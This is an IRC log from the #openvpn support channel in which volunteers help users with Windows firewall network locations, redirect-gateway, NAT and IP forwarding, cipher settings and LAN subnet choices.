14:34 < pekster> hrenovo: So change it 14:34 < hrenovo> pekster: how can I change it ? 14:34 < pekster> This channel isn't really going to be of use if you need networking support under Windows 14:34 < pekster> The control panel network thingy under Windows OS's lets you change pretty much all of that 14:34 < rob0> s/This channel/IRC/ :) 14:35 < pekster> Failing that, there's usually an ill-documented netsh or API interface to it as well. Google-fu would be a better bet, or whine on msdn if you don't find it in an hour of searching 14:38 < hrenovo> why does openvpn default installation put the openvpn adapter into public network instead of private. ? 14:38 < pekster> Windows default? At least the OS is starting to grow up (baby steps) and provide you slightly more security unless you work to reduce that 14:40 < pekster> It's not OpenVPN's place to set up your OS for you: that's your job 14:40 < pekster> Just like it won't automatically open your ipf or netfilter firewall, it won't do Windows OS setup for you either 14:41 <@EugeneKay> Because Public is the only sane default 14:41 <@EugeneKay> Windows network location selection is notoriously insane; don't read too far into it 14:42 <@EugeneKay> You can fiddle about in the registry if you really want 14:42 < pekster> penk: Tunnelblick? It's been a while since I ran that (no Macs here at present, so my info is a few releases out of date) but it should either give you a UI menu to view the log, or perhaps put it somewhere under ~/Library, IIRC 14:42 < penk> nah, this was openvpn connect 14:42 < penk> i got it, i needed to force uninstall and reinstall 14:43 < pekster> You want #openvpn-as for the commercial closed-source stuff. We deal with the GPL OpenVPN code/project specifically 14:45 <@EugeneKay> I can't find the writeup on it now 14:45 <@EugeneKay> But it isn't pretty 14:47 < pekster> I did some interesting hacks to avoid the so-called "dnscache" trick. 
I wrote about it on the user ML years back, but no one seemed to be interested in a more minimal solution, choosing to prefer stopping/starting services instead; I guess you can kill flies with a sledgehammer too :) 14:48 < pekster> (IIRC that wasn't actually a caching issue at all, but a domain search suffix list that didn't auto-update on interface changes properly. Fun times.) 14:49 < pekster> Apple's dnsctl looked like a work of art by comparison 14:50 < hrenovo> public is the only sane place to put it to? Maybe its private that is the only sane place 14:50 < hrenovo> vpn should work like lan 14:50 < hrenovo> and lan is on private network, not private by default 14:50 < rob0> A sledgehammer can indeed kill a fly, but as likely as not some other fly than the one you intended to kill. :) 14:50 < hrenovo> so excuse me , no , public is not "the only" sane place 14:50 < pekster> hrenovo: For your usecase, perhaps. What if I'm connecting to a paid service and don't want to open my network up to random other people to print to? 14:50 -!- MaynardWaters [~asdfjkl@c-71-238-30-69.hsd1.mi.comcast.net] has joined #openvpn 14:51 < MaynardWaters> hey I came in here for help a few days ago, I am having trouble connecting to my vpn 14:51 < pekster> hrenovo: If an OS decides to open my PC up to (ab)use/attack by other connections, I'd call that insane and broken 14:51 < MaynardWaters> http://pastebin.com/ids2Y4HE 14:51 < MaynardWaters> can anyone offer some advice as to what might be the problem 14:52 <@EugeneKay> hrenovo - as a network security expert, no, Private is not a good default. Period. If you have a problem with this assessment, feel free to become a government contractor. 
14:53 < pekster> MaynardWaters: Your TCP connection was reset, line 284 on that paste 14:54 < rob0> Connection reset, restarting (twice) 14:54 < MaynardWaters> pekster: I dont have that problem on my windows machine running openvpn right next to this ubuntu box 14:54 < pekster> OpenVPN cannot work when the peer closes the network socket. The peer logs might have more details, but that's occurring 11 seconds after connection was established 14:54 < rob0> Why are you using TCP? We don't know what reset the connection. It could have been something outside of openvpn. UDP might be better in your case. 14:55 < MaynardWaters> I did not set up the vpn, I believe TCP is the default set there, but I am unsure. 14:55 < rob0> it's a bad default, it's not openvpn's default 14:56 < MaynardWaters> well since I dont believe I have control over it, lets focus on the things I can change 14:57 < rob0> We still don't know what reset the connection. It could have been something outside of openvpn. 14:57 <@EugeneKay> !both 14:57 <@vpnHelper> "both" is If you do not control both ends of the link (server and client) then there is not much we can do to help you. Please talk to your network admin instead. 14:57 < hrenovo> EugeneKay: okay so public network is more secure than private? 14:57 <@EugeneKay> hrenovo - as far as the windows firewall defaults are concerned, yes. 14:57 <@EugeneKay> Always assume the other guy is out to get you 14:58 < hrenovo> so i've been doing some reading on how to change openvpn adapter from public to private, and it turns out that you can't 14:58 < hrenovo> because there is no gateway 14:58 < MaynardWaters> EugeneKay: my issue seems resolvable since I am using the same config files on windows with openvpn, and I do not have any problems there. so to me that means that i just need to figure out what the difference in settings are between my windows and my linux, and make the linux more like the windows, does this make sense to anyone? 
14:58 <@EugeneKay> MaynardWaters - it makes logical sense, but without more info we can't give you much 14:59 < MaynardWaters> so the more info that we all agree is needed is what is resetting the connection 14:59 <@EugeneKay> hrenovo - yup, that's how Windows networking is set up. You can push a dummy route with a high metric to fake a gateway (that will never get used) tho 14:59 < rob0> check firewalls 14:59 <@EugeneKay> Or the registry trick which I can't seem to google up today 14:59 < MaynardWaters> since the connection doesnt get reset on my other machine, it seems safe to assume it is on my local machine 14:59 < MaynardWaters> rob0: was that directed at me? 15:00 < pekster> hrenovo: You can change it just fine, at least on Vista (IIRC 7 is the same way, but I don't have 7 here to test) 15:00 < hrenovo> EugeneKay: would you happen to know which firewall rule win7 needs exactly for file sharing ? 15:00 < pekster> hrenovo: The "Network and Sharing Center", just like I said 15:00 <@EugeneKay> hrenovo - no clue what sort of file sharing you want. SMB? 15:01 <@EugeneKay> And not off hand, no. I don't memorize those port #s :-p 15:01 < hrenovo> EugeneKay: no, just regular cifs windows 7 to windows 7 on openvpn tap interface. Both win7 are vpn clients. 15:01 <@EugeneKay> SMB = CIFS 15:02 < hrenovo> I thought smb is samba, which is service you install on linux and share files on CIFS protocol to make them accessible by windows machines 15:03 < pekster> EugeneKay: FYI, I can change the public/private thing without a gateway on my tun adapter 15:03 <@EugeneKay> SMB and CIFS are two acronyms for the same thing. Samba is an implementation thereof for *nix systems. 15:03 < rob0> SMB is the predecessor of CIFS. Samba implements both. 15:03 < pekster> I just need to connect it first 15:05 <@EugeneKay> pekster - nifty. It's still a crap way to detect it. 
15:05 < pekster> Yup 15:05 < hrenovo> its just said that this is so difficult to share a folder on a windows vpn client 15:05 < hrenovo> sad* 15:05 <@EugeneKay> Fun fact: you can override the network location detection if your box is connected to AD, by setting up the subnet as a domain subnet. 15:06 < pekster> Oh, cute. :( 15:06 <@EugeneKay> Yup. Hence why I can't find the registry hack on my box - I don't need it. 15:07 < hrenovo> and there is no documentation on how to do it 15:08 < pekster> Really? Took me 30 seconds to search the web for this: http://www.home-network-help.com/simple-file-sharing.html 15:08 <@vpnHelper> Title: Enabling Simple File Sharing in Windows Vista (at www.home-network-help.com) 15:08 < pekster> Try harder. 15:19 < hrenovo> no 15:19 < hrenovo> this guide is not any help 15:19 < hrenovo> all the file and printer sharing is already enabled for openvpn adapter 15:20 < hrenovo> I can access shares on vpn adapter when firewall is turned off 15:20 < hrenovo> its a firewall setting 15:20 < hrenovo> I just don't know which 15:20 < hrenovo> I wrote some details here https://forums.openvpn.net/topic12494.html 15:20 <@vpnHelper> Title: OpenVPN Support Forum Windows 7 Firewall settings for File Sharing on VPN Adapter : Server Administration (at forums.openvpn.net) 15:23 -!- tcamuso_ [tcamuso@nat/redhat/x-baiqpapqcpburuam] has quit [Ping timeout: 264 seconds] 15:54 <@krzee> hrenovo, that shows its not an openvpn issue 15:55 < hrenovo> krzee: ok its not, its windows firewall. You are 100% right. If I ask on windows forums or #windows they have no idea how to help me 15:56 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Quit: I quit] 15:56 <@krzee> aww i didn't mean he had to gtfo, lol 15:56 <@krzee> just thought ild point out that its !notovpn lol 15:58 < rob0> If you don't know how to run Windows, find a better OS. 15:58 <@krzee> s/If you don't know how to run// 15:58 <@krzee> :D 15:58 < rob0> It's not hard. Just about any OS qualifies. 
15:59 < rob0> maybe not DOS, but FreeDOS is sort of interesting :) 16:00 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 16:02 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 16:07 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 16:13 -!- master_o1_master [~master_of@p4FF24AE2.dip.t-dialin.net] has quit [Ping timeout: 240 seconds] 16:19 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 16:20 -!- master_of_master [~master_of@p4FF24672.dip.t-dialin.net] has joined #openvpn 16:20 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 264 seconds] 16:21 -!- dave [~dave@static-66-137-171-68.axsne.net] has joined #openvpn 16:22 -!- dave is now known as Guest27261 16:23 -!- penk [~dave@static-66-137-171-68.axsne.net] has quit [Read error: Connection reset by peer] 16:23 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 16:25 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 16:26 -!- Guest27261 [~dave@static-66-137-171-68.axsne.net] has quit [Ping timeout: 248 seconds] 16:26 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 16:51 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:53 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Ping timeout: 264 seconds] 17:00 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 17:04 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 17:12 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 
17:15 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 17:18 -!- matt_ [~matt@mlpc.wiltshire.ac.uk] has joined #openvpn 17:19 < matt_> hello, i'm having problems attempting to get passtos to have any effect, I can see a tos value of 0x10 on the openvpn tap device but i dont see it on the outside 17:20 < matt_> has anybody had any issues with this before? I am not using user or group statements and I have seen passtos = ENABLED in the logs 17:20 < matt_> this is on the client side and i'm using openvpn version 2.2.2 17:21 -!- brute11k [~brute@89.249.231.53] has quit [Quit: Leaving.] 17:24 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 17:26 -!- tcamuso_ [~tcamuso@pool-71-161-82-88.cncdnh.east.myfairpoint.net] has joined #openvpn 17:30 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has quit [Quit: ocean pulls me close her whispers in my ear the destiny have chose all becoming clear the currents have their say the time is drawing near washes me away makes me dissapear i decend from grace in arms of undertow i will take my place in the great below] 17:31 -!- benkay [~benkay@c-71-237-161-120.hsd1.or.comcast.net] has joined #openvpn 17:32 < benkay> !goal ping through vpn to external web and to other nodes on vpn 17:33 < benkay> so! I have my vpn up and running, certs and keys distributed appropriately, but when I actually do the thing and connect to the vpn server (with all local traffic routed through the vpn with redirect-gateway def1), everything times out. and I mean everything. 17:34 < benkay> which is relatively good, because it shows that things are wired up appropriately, but there's something borked on the server because it seems that packets go to the server to die. 17:34 < benkay> which, undesirable. 17:34 < benkay> does anyone have any suggestions on how to diagnose where the pipe is breaking down? 
17:36 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 17:36 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 17:36 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 17:36 -!- mode/#openvpn [+o krzee] by ChanServ 17:36 < kisom> benkay: Firewall issue, or your server is not routing properly. 17:36 < kisom> Can you ping the servers VPN IP address? 17:36 <@krzee> kisom, pan behind server? 17:37 <@krzee> lan* 17:37 < kisom> krzee: Huh? 17:37 < benkay> can't ping, but can ssh into server and open vpn connection to server 17:37 <@krzee> whats his problem? with that first step I'm betting theres a flowchart for it 17:37 < benkay> kisom 17:38 <@krzee> oh, ya thats firewell 17:38 <@krzee> firewall* 17:39 < benkay> talking to me krzee? 17:39 <@krzee> ya 17:39 < benkay> but not in between my box and vpn server box, but between vpn server box and rest of webz? 17:42 < benkay> brb redirecting network traffic over broken vpn 17:44 -!- benkay [~benkay@c-71-237-161-120.hsd1.or.comcast.net] has quit [Quit: benkay] 17:45 -!- benkay [~benkay@c-71-237-161-120.hsd1.or.comcast.net] has joined #openvpn 17:49 <@krzee> benkay, you can't ping the vpn ip of the server, but can ssh to the vpn ip of the server… right? 17:50 < benkay> I have to ssh from my company's util box to the client box, but yes. 17:50 < benkay> (because whitelisting) 17:50 < benkay> but the vpn connection works fine. that's not whitelisted. 17:50 < benkay> er, whitelist-filtered. 17:51 < benkay> however we say that. 17:51 <@krzee> i have no idea what you're saying 17:51 <@krzee> what ip can you not ping? 17:51 < benkay> I can't ssh to the client box directly, as my ip is not on the ssh whitelist. 17:51 < benkay> I cannot ping the vpn server IP. 17:52 <@krzee> the vpn servers PUBLIC or VPN ip? 17:52 < benkay> public. 17:52 < benkay> what's the difference? 
17:52 <@krzee> the difference is HUGE 17:52 <@krzee> and in this case, it can be any firewall in between your machines, and has nothing to do with openvpn 17:53 < benkay> is the "vpn ip" the address the internal network sees the vpn server on? 17:54 <@krzee> post your server config and ill tell you the vpn ip 17:54 < benkay> cool and thanks! half a sec. 18:00 -!- benkay [~benkay@c-71-237-161-120.hsd1.or.comcast.net] has quit [Ping timeout: 260 seconds] 18:01 -!- benkay_ [~benkay@130.sub-97-50-230.myvzw.com] has joined #openvpn 18:01 < benkay_> still working on it. 18:04 < benkay_> would that be the local directive? 18:05 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Read error: Operation timed out] 18:06 <@krzee> !configs 18:06 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 18:07 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 18:08 -!- MacGyver [~MacGyver@unaffiliated/macgyvernl] has quit [Ping timeout: 264 seconds] 18:09 < benkay_> http://dpaste.com/hold/1030655/ 18:09 -!- MacGyver [~MacGyver@kershaw.polvanaubel.com] has joined #openvpn 18:09 -!- MacGyver [~MacGyver@kershaw.polvanaubel.com] has quit [Changing host] 18:09 -!- MacGyver [~MacGyver@unaffiliated/macgyvernl] has joined #openvpn 18:10 <@krzee> 10.8.0.1 is your vpn server ip 18:10 <@krzee> your first client will be .6 then .10 then .14 and so on 18:10 < rob0> eww, /30 18:10 <@krzee> line 15 will give you a problem 18:11 -!- tyteen4a- [tyteen4a03@69.50.229.69] has quit [Read error: Operation timed out] 18:11 -!- benkay_ is now known as benkay 18:12 < benkay> what will happen? 
18:13 <@krzee> not sure, never sent 2 args to --group 18:13 <@krzee> maybe an error on parsing, maybe it can't find the group "no" 18:14 < benkay> ah i see. 18:14 <@krzee> make sure --group matches a group 18:14 <@krzee> and --user matches a user 18:14 <@krzee> heh 18:14 < benkay> that was actually a typo in my dpaste-ing 18:15 < benkay> would you confirm something for me: I should still be connecting to the "public" ip, correct? 18:15 <@krzee> that config will change nothing about that 18:16 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 18:16 < benkay> yup! just confirming my hunces. 18:16 < benkay> hunches* 18:21 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 18:22 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 260 seconds] 18:22 <@krzee> benkay, when you want the connection to the server to be secured by the vpn, you connect to 10.8.0.1 18:24 -!- SuperGauntlet [~supergaun@d14-69-67-219.try.wideopenwest.com] has joined #openvpn 18:25 < SuperGauntlet> This is a noob question but can anyone point me towards a way to setup openvpn so that I can access the outside internet? Currently I can access the LAN but not the WAN 18:25 < SuperGauntlet> I'm sure it's a forwarding problem or something but I'm just not sure how to fix it 18:25 < SuperGauntlet> !welcome 18:25 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. 
|| Also interesting: !man !/30 !topology !iporder !sample 18:25 <@vpnHelper> !forum !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 18:25 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds] 18:25 <@krzee> SuperGauntlet, you want to redirect your internet over the vpn? 18:25 < rob0> !redirect 18:25 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 18:25 <@vpnHelper> http://ircpimps.org/redirect.png 18:26 < rob0> see the flowchart 18:26 < SuperGauntlet> haha you guys have all of this aliased? 18:26 < SuperGauntlet> You probably get these questions a lot. Thanks. 18:26 <@krzee> same questions everyday for years ;] 18:26 < rob0> we ... yes. 18:26 < SuperGauntlet> I bet that could be infuriating. Sorry for contributing to the tidal wave e.e 18:27 < SuperGauntlet> So I put --redirect-gateway local in /etc/openvpn/server.conf, correct? 18:27 < SuperGauntlet> Or does it go in client.conf? 18:28 < rob0> it's typically a push command from the server 18:28 < SuperGauntlet> !def1 18:28 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. 
or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 18:28 <@krzee> i think its better in the client 18:28 <@krzee> dunno why people typically put it in server as push 18:29 <@krzee> then their clients come in here saying "how do i bypass redirect-gateway getting pushed at me?" 18:29 < SuperGauntlet> So I add 'redirect-gateway' in client.conf/ovpn? 18:29 < SuperGauntlet> lol 18:29 < rob0> hehe 18:29 <@krzee> yep, with optional flags to redirect-gateway as seen in the manual 18:29 <@krzee> !man 18:29 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 18:29 < SuperGauntlet> rtfm indeed 18:31 < benkay> krzee: 10.8.0.1 is inside the vpn, right? i'm a little confused at the idea that I'd connect to an ip inside the vpn to connect to the vpn 18:31 < rob0> benkay, ? You misunderstand something, not sure what. 18:32 < SuperGauntlet> oh wow that worked 18:32 < benkay> "when you want the connection to the server to be secured by the vpn, you connect to 10.8.0.1" 18:32 < SuperGauntlet> when has it *ever* been that simple 18:32 <@krzee> benkay, once you are on the vpn, it only gives you a connection to the server over the vpn (unless you told it otherwise) 18:32 <@krzee> benkay, the vpn connection doesn't magically encrypt everything, only traffic destined by your routing table to flow over the vpn 18:33 < rob0> If you want to USE the vpn, you connect to the VPN IP. You connect openvpn itself to the outside IP. 18:33 < SuperGauntlet> wait, nope, doesn't work now. oh boy 18:33 <@krzee> SuperGauntlet, did you read ALL the instructions? 18:33 <@krzee> !redirect 18:33 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. 
or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 18:33 <@vpnHelper> http://ircpimps.org/redirect.png 18:33 < SuperGauntlet> I'm just working through it. 18:33 <@krzee> 3 things to do, only 1 is in the openvpn config 18:34 < SuperGauntlet> I tried the first thing and it appeared to work but didn't. Pinging 8.8.8.8 produces 100% packet loss 18:34 <@krzee> what os is the server? 18:35 < SuperGauntlet> ubuntu minimal 18:35 <@krzee> !linnat 18:35 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 18:35 <@krzee> !linipforward 18:35 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 18:35 < SuperGauntlet> so use iptables 18:35 < SuperGauntlet> where's sysctl.conf? 18:36 <@krzee> its your os... 18:36 < SuperGauntlet> Sorry, thought you knew 18:36 <@krzee> do, but not spoonfeeding 18:37 < SuperGauntlet> I already have that forwarding on apparently 18:39 < SuperGauntlet> It works, thanks! 18:40 <@krzee> yw =] 18:41 < SuperGauntlet> I like how there's no username/pw involved, all you need is the client config and certs/keys 18:41 < benkay> i'm beginning to get it krzee, rob0 (thanks for your patience and explanations, by the way). 
so for an encrypted connection I connect to the server's public ip and then ssh to the VPN server id? 18:42 <@krzee> you connect to the vpn, then use whatever you want on the servers vpn ip 18:43 <@krzee> for example, if the server runs smtp, to connect to smtp over the vpn you must have the smtp server listening on the vpn ip and connect to that 18:43 < benkay> awesome. 18:47 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has joined #openvpn 18:47 < benkay> so then in a situation where I route all of my local traffic through the vpn interface which connects to the vpn server's public ip, how do I then pass it out to the greater internet at large? 18:47 -!- Matir [~matir@ubuntu/member/matir] has quit [Read error: Operation timed out] 18:47 < benkay> oh, unbreak firewall. 18:48 <@krzee> benkay, we just helped SuperGauntlet do that above ^ 18:49 < SuperGauntlet> they aren't joking when they say it's a firewall issue 18:49 < benkay> thanks :) 18:49 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 18:59 -!- raidz is now known as raidz_away 19:08 < benkay> !nat 19:08 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 19:08 < benkay> !linnat 19:08 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 19:11 < benkay> wtf masquerade? 
19:16 < SuperGauntlet> Yeah I've never heard of that command before either
19:17 < SuperGauntlet> Did it work?
19:20 < benkay> we'll see.
19:23 < benkay> hello world?
19:23 < benkay> !help
19:23 < benkay> !welcome
19:23 <@vpnHelper> (help [<plugin>] [<command>]) -- This command gives a useful description of what <command> does. <plugin> is only necessary if the command is in more than one plugin.
19:23 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
19:23 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
19:23 < benkay> whoa.
19:23 < benkay> so apparently things were going out but no traffic was coming back in?
19:25 < benkay> !interface
19:25 <@vpnHelper> "interface" is (#1) paste interface configuration from both client and server, while being disconnected and when being connected. Be sure to also add the routing tables for both situations from client and from server or (#2) For Windows: iface: 'ipconfig /all' routing: 'route print' (add -4 or -6 for just IPv4 or v6) or (#3) For Unix: iface: 'ifconfig -a' routing: 'netstat -rn' or (#4) For Linux:
19:25 <@vpnHelper> iface: 'ip a' routing: 'ip r' (use ip -6 for IPv6 routes)
19:36 < benkay> no, it did not work.
19:58 < benedikt> How do i create an intermediary CA under the root ca that ./build-ca creates?
19:59 < benedikt> In short I want a CA structure like Root CA -> Intermediary CA -> Server -> Clients
20:01 < benedikt> nevermind
20:01 < benedikt> (pkitool)
20:51 < benedikt> If i have two vpn servers, both have their key signed by the same ca.
22:28 < civillian> Hi all
22:28 < civillian> I'm getting this: Cipher algorithm 'DHE-RSA-AES256-SHA' not found (OpenSSL)
22:28 < civillian> Despite that being listed in openssl ciphers -v
22:28 < civillian> any tips?
22:30 < Poster> was openvpn compiled against a different version of openssl?
22:30 < civillian> These are debian packages, pre-built
22:33 < Poster> does tls-cipher EDH-RSA-DES-CBC3-SHA work?
22:33 < civillian> I'm just using the cipher directive, should i use tls-cipher?
22:33 < Poster> oh, try cipher
22:34 < civillian> doesn't work, same error Cipher algorithm 'EDH-RSA-DES-CBC3-SHA' not found (OpenSSL)
22:34 < Poster> is the client trying to force that?
22:35 < civillian> this is just me trying to restart the server process
22:35 < civillian> it won't start with these cipher settings
22:35 < Poster> maybe try both cipher and tls-cipher
22:35 < Poster> I've not encountered what you describe
22:36 < civillian> I used AES-256-CBC previously
22:36 < civillian> that was OK
22:36 < civillian> is there any issue staying with that one?
22:36 < Poster> not that I am aware of, though I am pretty oblivious to the different cipher types
22:37 < civillian> strangely this worked:
22:37 < civillian> cipher AES-256-CBC
22:37 < civillian> tls-cipher DHE-RSA-AES256-SHA
22:37 < civillian> both directives in there
22:38 < Poster> ok cool
22:59 < pekster> civillian: You're confusing --cipher with --tls-cipher
23:00 < pekster> civillian: --show-tls shows you a list of "cipher-suites" used to negotiate the control channel. --show-ciphers shows you options for the symmetric cipher used to secure the data channel. They're different components, and use different options
23:01 < pekster> (and related is --show-digests that shows you hashing digests that you can set for the --auth option)
--- Day changed Fri Mar 22 2013
02:32 * EugeneKay yawns
03:31 < cippaciong> hello
03:32 < cippaciong> I'm trying to understand how to properly use routing in openvpn
03:32 < cippaciong> but there are some things I can't understand
03:34 < cippaciong> I have a LAN with ip 192.168.0.X where I have the openvpn server
03:34 < cippaciong> which has ips 192.168.0.9 and tun0 10.8.0.1
03:35 < cippaciong> I use port 1194 and I forwarded the requests to this port to 192.168.0.9 using my router interface
03:35 < cippaciong> (a user-end netgear router)
03:36 < cippaciong> I can connect to the vpn and ping the server using 10.8.0.1 but not 192.168.0.9
03:37 < cippaciong> My goal is to be able to access the LAN PCs through the remote client
03:39 < cippaciong> the hard part is that I can't understand what has to be set on the server and what in the router interface
04:06 < jzaw> cippaciong, use a non conflicting subnet on the remote lan ... ie 192.168.1.x
04:07 < jzaw> and set up routes so any host at the server end knows how to reach any host at the client end
04:07 < jzaw> and vice versa
04:11 < cippaciong> jzaw: actually I don't need server lan hosts to reach client lan hosts
04:11 < cippaciong> I only need client to reach server lan hosts
04:23 < pppingme> cippaciong did you get everything worked out?
04:24 < cippaciong> nope
04:25 < pppingme> are you doing tap or tun interfaces on the vpn?
04:25 < cippaciong> tun
04:25 < pppingme> and your goal is to reach stuff on your network from the vpn clients, right?
04:25 < cippaciong> exactly
04:26 < pppingme> ok, I'm going to guess there's two adjustments you need to make, but let me understand a couple things first..
04:26 < pppingme> you're using the default 10.8.x.x ip range for vpn clients?
04:26 < cippaciong> yes
04:26 < pppingme> and whats the ip range on your lan?
04:27 < cippaciong> 192.168.0.X
04:27 < cippaciong> but I have dhcp enabled only from 192.168.30 to .255
04:27 < pppingme> ok, I would HIGHLY recommend you change that, but we can work with that if its a problem.
04:27 < cippaciong> from 1 to 30 I use static ips
04:28 < cippaciong> I'm all ears
04:28 < pppingme> the reason is, if you take your laptop to another place that uses 192.168.0.x, it can cause confusion for your laptop
04:28 < pppingme> but thats not one of the two changes I would recommend..
04:28 < pppingme> wait, I phrased that poorly...
04:28 < pppingme> thats not one of the two changes we need to make...
04:29 < pppingme> so do you want to "fix" that before we go further or leave it as it is for now?
04:29 < cippaciong> how should I fix it?
04:30 < pppingme> how well do you know your router?
04:30 < cippaciong> average
04:30 < cippaciong> I mean, do you want me to change the ip class for my lan?
04:31 < pppingme> class is a bad word..
04:31 < cippaciong> wops
04:31 < pppingme> but the goal is to move away from the 192.168.x.x ranges
04:31 < cippaciong> towards what?
04:31 < cippaciong> 10.x.x.x?
04:32 < pppingme> If you're using 10.8.0.x on the vpn, then I'd probably use something like 10.8.10.x with a netmask of 255.255.255.0 on the lan, so your router would be 10.8.10.1 and your static ip machines would be 10.8.10.2-30 like they are now, and your dhcp starts above that and goes as far as you want
04:33 < pppingme> you're doing dhcp on the router, right?
04:34 < cippaciong> yes
04:34 < pppingme> ok
04:34 < jzaw> this is fun .... it'll just give you a suggestion
04:34 < jzaw> http://scarydevilmonastery.net/subnet.cgi
04:34 <@vpnHelper> Title: subnet suggestor (at scarydevilmonastery.net)
04:34 < pppingme> does everything I just said make sense?
04:35 < jzaw> refresh that page if you dont like the suggested subnet
04:36 <@EugeneKay> If you really want to avoid subnet clashes, use something out of 172.16.0.0/12
04:36 < pppingme> I've come across more 172.16/12 networks than 10/8 networks, I duno if thats a fluke or more common sense net-admins..
04:37 * jzaw hopes its the latter ;)
04:37 < pppingme> I guess I only work with smart people :)
04:37 < pppingme> when I do come across 10.x.x.x networks, they are almost always using an 8 bit mask.. and yes, I always fix that
04:39 <@EugeneKay> Using the maximum mask size is so stupid.
04:40 < pppingme> with that argument you could say most home users should use /29 or /28, maybe /27 if they have a lot of stuff
04:40 <@EugeneKay> Minimum mask size is also stupid
